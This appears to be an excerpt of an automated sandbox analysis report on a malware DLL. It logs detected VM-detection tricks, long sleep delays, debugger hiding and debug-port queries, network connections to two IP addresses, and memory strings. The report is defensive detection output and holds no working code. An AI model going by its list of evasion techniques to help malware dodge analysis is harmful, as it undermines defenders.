Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 248EB86
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 24F46DB
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 237C62C
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 1C541B5
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 23C379C
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 23C6D08
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 25E4462
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 238337D
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 1EF2BE5
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 1E985DF
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 23B209D
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 1CE8206

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Windows\System32\loaddll32.exe

Special instruction interceptor: First address: 1DC139B instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 756

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7544	Thread sleep count: 756 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7544	Thread sleep time: -75600s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3852	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5448	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6640	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select SerialNumber from Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: Amcache.hve.25.dr	Binary or memory string: VMware
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.25.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.25.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.25.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000D.00000003.3488254082.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.25.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 0000000D.00000002.3747588655.0000000002AD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: Amcache.hve.25.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.25.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.25.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.25.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.25.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.25.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.25.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.25.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.25.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.25.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.25.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.25.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\loaddll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 104.20.3.235 443			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 208.109.246.134 5002			Jump to behavior

Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rwinmgmts:\\localhost\root\securitycenter2	memstr_19a0f948-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a\local	memstr_1d831842-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: logonserver=\\user-p	memstr_bff6a393-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a\locallogonserver=\\user-p	memstr_8b21e795-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ommon files\oracle\java\java	memstr_ace6334a-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (x8ommon files\oracle\java\java	memstr_7f50c023-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qrshe	memstr_04a9194a-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ata\loca	memstr_609bce41-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathext=.com;.exe;.bat;.cmd;.vbs;.v	memstr_10e22c80-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pps;pathext=.com;.exe;.bat;.cmd;.vbs;.v	memstr_5bdd49f4-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: js;.jse;	memstr_50b9e54e-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =amd64	memstr_4debbb41-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =amd64p	memstr_82b2c49c-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l64 fami	memstr_610e9a25-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntifl64 fami8	memstr_a066ff26-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uing	memstr_20653d1b-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gramfile	memstr_d9c5124e-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gram9	memstr_ed8dc555-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gramfilegram9	memstr_aaac654f-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndows	memstr_9d4d6ab6-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: path=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;	memstr_3e97bae5-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \system32\window	memstr_8f90662a-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: clsid\{e7d35cfa-348b-485e-b524-252725d697ca}=c	memstr_03a82e04-5
